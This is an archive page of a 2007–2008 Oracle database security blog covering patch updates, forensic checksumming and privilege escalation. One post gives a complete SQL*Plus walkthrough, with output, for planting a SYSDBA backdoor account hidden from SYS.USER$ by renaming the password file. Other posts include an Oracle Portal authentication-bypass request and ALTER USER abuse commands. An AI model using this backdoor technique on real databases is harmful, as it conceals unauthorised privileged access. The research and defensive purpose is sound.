Archive for the 'Uncategorized' Category

Sysdba Backdoor in Japan

Paul Wright August 25th, 2008

Just noticed that my SYSDBA Backdoor paper has been published in Japan through NGS’ contacts.
www.dcs.co.jp/security/NGS_freedownloads/OracleSysDBA_Backdoor.pdf
It is a compliment for this work to be of widespread use and there is more on the way..

There is still a lot of work that needs to be done with database security in general not only in the form of software bugs that raise security issues but also in securing the data itself. Pete has an article on the PA Consulting incident here.

I note that the majority of reported incidents in the UK are govt agencies as they are more duty bound to inform of the breach. UK based private companies are not under the same responsibility to inform of a breach compared to US companies as can be seen at http://www.privacyrights.org/ar/ChronDataBreaches.htm
Wells Fargo and the InterActive Financial Marketing Group are among recent victims in the US. Would these companies have notified if they were in the UK and how many private companies choose not to notify in the UK each year? To compare with the US they have had over a 1,000 notified breaches since 2003 averaging in cost at $6.3million dollars each. There is probably a similar amount of activity in the UK and the average cost of a breach in the UK is £1.4 million(Ponemon Institute, LLC). Would the UK benefit from a data breach law? It would certainly benefit from more use of GPG or Truecrypt on exported data.

Cheers,
Paul

PL/SQL Source code version in the DB

Paul Wright August 17th, 2008

I have experienced that it is common for the version of code in the PRODUCTION DB to be different from that which CVS or Subversion says it is i.e. code in the DB can be out of sync with the code repository.
This can be ascertained by a simple query
SELECT TEXT FROM DBA_SOURCE WHERE NAME=PACKAGE_NAME;
Or by checksumming the code automatically as laid out in my book.
Of interest is the fact that in some situations the code source of a procedure is still present in DBA_SOURCE even though the procedure has been dropped…more to come on this as remains of deleted data often form evidence which would be of interest in a forensic investigation.

If you have not seen it this thread is an interesting one at Pete’s site. One of the reasons for wanting to control access to the ALTER USER command could be to stop a user making themselves EXTERNALLY
identified.
ALTER USER SCOTT IDENTIFIED EXTERNALLY or maybe even
ALTER USER SCOTT IDENTIFIED BY VALUES ‘EXTERNAL’;
Also
ALTER USER SCOTT IDENTIFIED BY VALUES ‘SCOTT.BADPROC’;
Which could be executed if called from a script that reads in DB users and passwords.
Additionally the ALTER USER syntax gives that user the ability to set up proxy relationships via a command such as
ALTER USER SCOTT GRANT CONNECT THROUGH ORCL AS DBA;

In terms of user management removing the ability to do the above is a good idea so nice thread.

Just noticed on Bugtraq the following vulnerability thread. http://www.securityfocus.com/archive/1/495336
This gives a DBA role user the privilege of SYSDBA. This is a vulnerability as DBA cannot stop and start the DB and read the X$ tables i.e. they are not the highest privilege, so SYSDBA access could present a security problem. I think this is especially true given that access to strong crypto on 10gR2 via DBMS_CRYPTO is restricted to the SYSDBA user. However there are many other ways to escalate DBA to SYSDBA so perhaps there are higher priorities currently for most sites.

Cheers,
Paul

July CPU ~ OID Denial of Service

Paul Wright July 21st, 2008

The July CPU is beginning to settle now and some Ora exploits are surfacing.
For instance this denial of service in OID http://www.milw0rm.com/exploits/6101
Plus there has been a PL/SQL vuln to full-disclosure http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0240.html
Plus an interesting bug in dbms_random http://www.securityfocus.com/archive/1/494540/30/0/threaded
There are still more in the pipeline so worth keeping on top of the CPU patches.

Sysdba privilege escalation

Paul Wright June 2nd, 2008

This post seems to have slipped under the radar and is another example of SYSDBA privilege escalation.
http://www.pythian.com/blogs/388/exploiting-sysdba-invoker-rights-using-trigger-on-database
There are a number of other internal privilege escalations in the RDBMS which use similar principles…more to come on this..

11g Security

Paul Wright May 25th, 2008

As soon as 11g came out I tested the ability to brute force it as per the NISR paper I wrote a while back..
http://www.ngssoftware.com/research/papers/oraclepasswords.pdf
Great news as Oracle have fixed the listener so that multiple connections can not be made in quick succession. The listener in 11g will indeed slow down the speed with which it replies to requests if they come from the same user as is the case with a normal brute force. However the listener only slows down IF the user account exists. Therefore it is a quick and easy task to enumerate existing usernames by trying to brute force their password and seeing if the listener slows down the attempt or not. This has already been reported to Oracle.
11g is certainly an improvment but there is still work to be done. For instance the 11g password algorithm may be more complex (salted) but the 10g passwords still remains in place in sys.user$ even when 11g password algorithm is used. The 10g passwords should be deleted if they are not being used so this is an important hardening step for the DBA to take on 11g. Of course test first and back up the hashes so they can be reinstated if necessary.
Additionally the PL/SQL wrapping algorithm has not been changed which will be on the list for the next release give that it has been publicly reversed by Pete Finnigan and others (see Oracle Hacker’s Handbook).
The fact that 11g audit has less performance impact is very good as there will be less reason to switch it off. This is important given that DB IDS and other off server monitoring systems are far from 100% in their accuracy.
Performance stats for 10g Vs 11g basic audit would interesting to see.
BTW I just upgraded WordPress to the latest version which was a doddle using this youtube videovideo http://www.youtube.com/watch?v=3l5g7F9zk3I

Application Server Vulnerability

Paul Wright May 11th, 2008

http://www.securityfocus.com/archive/1/491865

In short if an unauthenticated user makes this request:
“http:/site/pls/portal/%0A”
Then they will be able to access this URL
“http://site/dav_portal/portal/”
as though they were authenticated.

Interesting bug i thought.

Also I came across the web site below the other day which has some interesting material on it regarding Oracle Security such as 10g password hashing algorithm written using python http://www.thesprawl.org/infocalypse/index.php?title=Oracle_Authentication#Oracle_7-11_Password_Hashing_Algorithm

For your reference the Oracle 11g hashing algorithm implemented using Python
http://blog.red-database-security.com/2007/09/21/oracle-password-algorithm-11g-poc-code/

11g vulnerabilities ~ more detail

Paul Wright May 5th, 2008

More details on April 2008 CPU vulnerabilities.
http://www.securityfocus.com/archive/1/491521
http://www.securityfocus.com/archive/1/491522
http://www.securityfocus.com/archive/1/491524
Exploit code may be in the pipeline so check Millw0rm etc. Note that the last two affect 11g as well. The CPU installation has been smoother and more reliable in my experience so should seriously think about installing this especially if your DB needs to restrict privilege to DB users i.e. low privileged users access Oracle directly.
For custom packages it is also worth auditing your PL/SQL packages using plsqlscanner or similar http://www.red-database-security.com/software/plsqlscanner.html
Details about the DB04 vulnerability which I found are available at my publisher’s URL . http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

Lateral SQL Injection

Paul Wright April 25th, 2008

David has released his latest paper which investigates how by changing NLS variables an attacker can inject SQL into functions that do not normally take varchar input e.g. those that accept dates. Also functions that do not take input but that do rely on NLS variables are similarly affected. Lateral thinking.
Here is the paper http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf and congrats to NGS on winning the SC Security Company of the Year. http://www.scmagazine.com/uk/awards/ and even more congrats to Betfair for winning Queen’s award again. http://www.realbusiness.co.uk/news/international-business/5240271/queens-awards-the-big-winners.thtml

Java Oracle Security

Paul Wright April 22nd, 2008

Oracle Middle tier applications usually use Java which is why I have been working on Java Security both at work and for SANS in terms of training at http://www.sans.org/london07/description.php?tid=1517 and presenting http://www.sans.org/sans2008/night.php.
Here are the Powerpoint notes in PDF from my latest presentation javasecurity.pdf given April 22nd at SANS Orlando.

April 2008 CPU

Paul Wright April 15th, 2008

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html

April 2008 CPU came out at 9.00pm UK time tonight as normal. Two of the vulnerabilities are ones that I found whilst working at NGS and are both PL/SQL injections but the most critical bug is the JInitiator JVM bug… Java Vulnerabilities are the subject of a Presentation I am giving next week at SANS Orlando http://www.sans.org/sans2008/night.php ..More to come on this subject.

Cheers,
Paul

Checksumming Presentation

Paul Wright March 22nd, 2008

Hello Folks,
I have just been asked for a copy of the UKOUG presentation I gave in December at Brimingham as the person asking could not find it on UKOUG’s site so here it is. The UKOUG site is being updated so this may explain the current difficulty finding recent papers as the last two year’s conferences were not on there when I looked. In January, I moved work place to the centre of London at Betfair.com. Here is some information about Betfair and Oracle http://www.oracle.com/customers/snapshots/betfair-database-case-study.pdf.
Also this is the Head of our Security Department at Betfair Adrian Asher.

As an aside, for Imperva users out there, I noticed that there is an alert on Bugtraq for Imperva SecureSphere
http://www.securityfocus.com/bid/28279/info . The solution is to upgrade to version 6.0. This is an important upgrade as it fixes a number of problems with version 5.0.

General release of the Oracle Forensics book is in May.
http://www.amazon.com/Oracle-Forensics-Security-Practices-Focus/dp/0977671526
If you want a reviewer’s copy just send me an email to paul@oracleforensics.com

David’s book will also be out this year as well so promising to be an eventful year.
http://www.amazon.com/Oracle-Forensics-Using-Quisix-Litchfield/dp/047019118X

From a general IT Security point of view I think the role of IT Security in the political process is an interesting one and from a strategic level this presentation may provide some relief from Infosec.
http://www.oracle.com/global/uk/citizen-security/speakers.html

My next presentation is at SANS Orlando, with Stephen Northcutt, on Java Security so I had better get back to writing it..

Take care, have a great Easter and don’t forget to set the clocks forward on the 30th.
Paul

AlexK Best of 2007 in English

Paul Wright January 4th, 2008

Alex Kornbrust’s Best of Oracle Security Paper 2007 in English. Thanks for the mention Alex.
Also good paper from David on in-memory backdoor.

Research from Arizona University

Paul Wright January 4th, 2008

Its good to have time to do some reading. If you are interested in DB forensics I recommend some of the work from Arizona University listed below including a new thesis on the subject of database forensics. http://www.cs.arizona.edu/projects/tau/tbdb/MelindaMalmgrenThesis.pdf
as well as these preceding papers..

Kyri Pavlou and Richard. T. Snodgrass, “The Pre-images of Bitwise AND Functions in Forensic Analysis,” TimeCenter TR 87, October, 2006. [.pdf]

Kyri Pavlou and Richard T. Snodgrass, “Forensic Analysis of Database Tampering,” in Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD), pages 109-120, Chicago, June, 2006. (pdf)

Richard T. Snodgrass, Stanley Yao and Christian Collberg, “Tamper Detection in Audit Logs,” In Proceedings of the International Conference on Very Large Databases, Toronto, Canada, August–September 2004, pp. 504–515. (pdf)

Oracle Forensics Book ~ Now Available

Paul Wright December 26th, 2007

About time too! Copies available through Rampant Techpress. Author’s copies in the UK can be made available to reviewers by contacting reviewcopy@oracleforensics.com.
Cheers and Merry Christmas 2007bookout2.jpg

SYSDBA Backdoor without direct OS access

Paul Wright December 24th, 2007

First half of SYSDBA BACKDOOR paper is easily done without OS access
————————————————————————–
Attacker brute forces a SYSDBA user and wishes to create a user that is hidden from SYS.USER$.
1. CREATE USER
2. GRANT SYSDBA TO USER
3. Rename password file via UTL_FILE.RENAME (requires CREATE DIRECTORY).
4. DROP USER via the DB to lose from SYS.USER$
5. Rename password file back

In detail on 11g Unbreakable Linux:
————————————
First how to get the location and filename of the OS based password file.
By default it is in the same directory as the SPFILE which can be gained as follows.

//get the location
SQL> SELECT value FROM v$parameter WHERE NAME=’spfile’;
VALUE
——————————————————————————–
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/spfileorcl.ora

//get the name of the password file
by default the filename is
PWD.ora (on windows) or
orapw on UNIX.

SQL> select global_name from global_name;
GLOBAL_NAME
——————————————————————————–
ORCL

Therefore attacker can find out the information below:
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/orapworcl

So here we go in SQL*PLUS for demo purposes.

//create the backdoor SYSDBA user.

SQL> create user attacker identified by attacker
2 default tablespace users
3 temporary tablespace temp;
User created.

SQL> GRANT SYSDBA TO attacker;
Grant succeeded.

//remote machine
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:07:08 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> show user
USER is “SYS” //backdoor attacker account is working
SQL>

//the account is listed in sys.user$
SQL> SELECT NAME FROM SYS.USER$ ORDER BY NAME;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
ATTACKER
AUTHENTICATEDUSER
BI

//attacker gets rid of the sys.user$ entry by first creating a directory to access the password file.
SQL> create directory password_file as ‘/home/oracle/app/oracle/product/11.1.0/db_1/dbs’;
Directory created.

//attacker renames the password file so that the subsequent drop user does not affect the password file
BEGIN
UTL_FILE.FRENAME(’PASSWORD_FILE’, ‘orapworcl’, ‘PASSWORD_FILE’, ‘orapworclBU’, TRUE);
END;
/

//then drops the user
SQL> drop user attacker;
User dropped.

–try to logon as sysdba now fails
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:13:39 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
ERROR:
ORA-01031: insufficient privileges
Enter user-name:

–copy back the password file by renaming it to the original name with the overwrite option set to TRUE.
SQL> BEGIN
2 UTL_FILE.FRENAME(’PASSWORD_FILE’, ‘orapworclBU’, ‘PASSWORD_FILE’, ‘orapworcl’, TRUE);
3 END;
4 /

PL/SQL procedure successfully completed.

–attacker no longer in sys.user$ or dba_users but can logon remotely as SYSDBA.
SQL> select name from sys.user$ order by name;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
BILL

To secure against this first make sure that no one can brute force as SYSDBA(see previous OraBrute paper).
Then regularly check x$ tables and statecheck pwfile as well as oracle binary.
In addition it is generally good security to remove means of accessing OS from DB both via UTL_FILE/Java and restrict the CREATE DIRECTORY privilege.
In terms of forensic investigation the last modified timestamp on the file does not change when it is renamed but the last accessed does (NTFS) but that is for another posting…more to come….and Merry Christmas!

SYSDBA Backdoor

Paul Wright October 14th, 2007

New Oracle Security/Forensics paper. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf
This paper is in follow up to Oracle Passwords and OraBrute paper which described the issue of SYSDBA brute forcing in 10g. Subsequent to brute forcing a SYSDBA account an attacker will wish to maintain SYSDBA access in a covert manner such that a DBA or security auditor will not be aware that the attacker has maintained this access over time. Within Oracle databases such as 11g it is a quick and easy task to create a SYSDBA account that is hidden from SYS.USER$, DBA_USERS, V$PWFILE_USERS and GV$PWFILE_USERS so that a user with DBA privileges cannot tell that the hacker’s SYSDBA account is present in the DB. This paper examines such a SYSDBA “backdoor”, proposes defenses and appropriate forensic response with more detail in new Oracle Forensics Book..
book_cover_forensics_255.jpg

http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
This issue affects all supported versions of Oracle’s RDBMS.

Finding Evidence of Data Theft in the Absence of Auditing

Paul Wright August 10th, 2007

David Litchfield’s latest paper on Oracle Forensics is available at this URL.
http://www.databasesecurity.com/dbsec/OracleForensicsPt5.pdf

Forensic checksumming on all versions of supported Oracle databases

Paul Wright July 25th, 2007

Below is an excerpt from my new book on Oracle Forensics which is available through Rampant Techpress and contains both the underlying concepts and advanced practice of Oracle forensics for both incident handling and vulnerability detection. A cornerstone of the book is the need to fully understand the methods that an attacker may use to attack an Oracle server so that the security practitioner can effectively secure the DB and respond effectively to an incident.Excerpt:
Checksums have been used in forensics to verify the state of a piece of code for many years both in terms of Tripwire OS applications and also lists of known good checksums such as those produced at NIST http://www.nsrl.nist.gov/ .
Creating checksums in an Oracle database to verify integrity is pretty straightforward.
DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9, 10 and fast but has different implementation on 7 therefore a different checksum is returned. This is not good for forensic consistency.
DBMS_OBFUSCATION.MD5 is good on 9 and 10 (not 8) and cryptographically stronger than DBMS_UTILITY but slower due to the more complex computation.
DBMS_CRYPTO HASH_SH1 is on 10 only and not fast but the most secure of the three. Additionally, use of MD5 and SHA1 together is not susceptible to malicious use of a collision where two files with differing content have the same checksum. http://www.doxpara.com/md5_someday.pdf. By using stripwire http://www.doxpara.com/stripwire-1.1.tar.gz it is possible for an attacker to control the content of a malicious collision.

However, using both MD5 and SHA1 checksums, dual collisions become all but impossible.

In summary DBMS_UTILITY is useful for checking patches and day to day state checking where speed is important but for higher security MD5 or preferably SHA1 should be used. For very high security purposes it is preferable to check integrity using a combination of both MD5 and SHA1.

Here is an example to check the state of VIEWs in a given schema using SHA1 algorithm:

set wrap off
set linesize 400
set serveroutput on
DROP TABLE SHA1VIEWSTATES
CREATE TABLE SHA1VIEWSTATES(SHA1SCHEMA VARCHAR2(40), SHA1NAME VARCHAR2(40), SHA1CHECKSUM VARCHAR2(40));
CREATE OR REPLACE PROCEDURE SHA1DBVIEWSTATECHECKER(lvschema in varchar2) AS TYPE C_TYPE IS REF CURSOR;
CV C_TYPE;
string varchar2(32767);
l_hash raw(2000);
lvname VARCHAR2(30);
lvtype varchar2(30) :='VIEW';
begin
OPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' using lvschema;
LOOP
FETCH CV INTO lvname;
DBMS_OUTPUT.ENABLE(200000);
l_hash:=dbms_crypto.hash(dbms_metadata.get_ddl(lvtype, lvname, lvschema), dbms_crypto.hash_sh1);
dbms_output.put_line('HashSHA1='||l_hash||' Name='||lvschema||'.'||lvname);
insert into SHA1VIEWSTATES values(lvschema, lvname, l_hash);
EXIT WHEN CV%NOTFOUND;
END LOOP;
CLOSE CV;
end;
/
EXEC SHA1DBVIEWSTATECHECKER('SYS');
SELECT * FROM SHA1VIEWSTATES;

–Carry out again in the future using HA1PACKAGESTATEVIEWSNEW table and compare to the baseline to see if there has been change.
–If both resultsets are identical there should be no result from this query.

(((select * from SHA1PACKAGESTATEVIEWS)minus
(select * from SHA1PACKAGESTATEVIEWSNEW))UNION
((select * from SHA1PACKAGESTATEVIEWSNEW)minus
(select * from SHA1PACKAGESTATEVIEWS)))

I am going go to SANSFIRE now in Washington DC where I will be leading a BoF on Oracle Forensics to launch my new book, Auditing the GCIA for ANSI and testing the new GSEs for SANS/GIAC as well as catching up with some old friends.
Cheers,
Paul
Additional relevant links:
http://eprint.iacr.org/2006/104.pdf
http://web.mit.edu/AFS/sipb/project/fastcoll/
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

Catchup

Paul Wright May 20th, 2007

Not been blogging for a while due to being busy at work. In the meantime there has been the following.
1.Oracle Audit Vault released by Oracle, but don’t forget to read the trial license…and that goes with many “free” Oracle products interestingly (30 days IOW).
2. Oracle Forensics Live response paper by David. Starts with code that could give the DBA a nasty surprise on reboot. Extends the idea of creating a checksum profile that can be stored and compared at a later time. Checksums for Java Byte code can be made using code in the paper. Additionally David pays reference to a commercial unwrapper for PLSQL. Unwrappers have been around for a while. In order to be forensically sure of a piece of codes effect then the source code needs to be read so an unwrapper will have many positive uses.
3. http://www.ukoug.co.uk/calendar/show_event.jsp?id=2861
is an interesting SIG meeting with a security flavour, though the contents of Pete’s presentation are already online. Professor Carl Dudley’s presentation on TDE is also worth making a journey for.
4. David is giving a very interesting talk at AusCERT. Wish I was there and not just for the sun… as this presentation looks like the current “whats hot”. http://conference.auscert.org.au/conf2007/presentation.php#presentation_TP_04

On a personal side note. If anyone watched the BEEB documentory on Hendrix…small correction needs to be added. Hendrix’s output did not go down hill after Woodstock as Band of Gypsys album which is his most critically acclaimed album by many officianados was on New Years AFTER woodstock.
http://www.amazon.com/Band-Gypsys-Jimi-Hendrix/dp/B000002UVX
Also his influences were largely US soul not the brit pop of the time as the documentary suggest.
http://www.earlyhendrix.com/disco/confir.htm
For a much better Hendrix documentary I recommend “Jimi Hendrix” http://www.imdb.com/title/tt0070242/

April 2007 CPU

Paul Wright April 19th, 2007

The April 2007 CPU is out at this URL. It is worth taking a DBState of before the patch and one after to see what has changed as per my GSOC paper.
NGS are the only company with two researchers mentioned and David was first to publish an in-depth analysis of the CPU at this URL
http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf
David’s analysis may have been first because he found most of the vulnerabilities including the most critically rated.. and there are plenty more to come..

Next »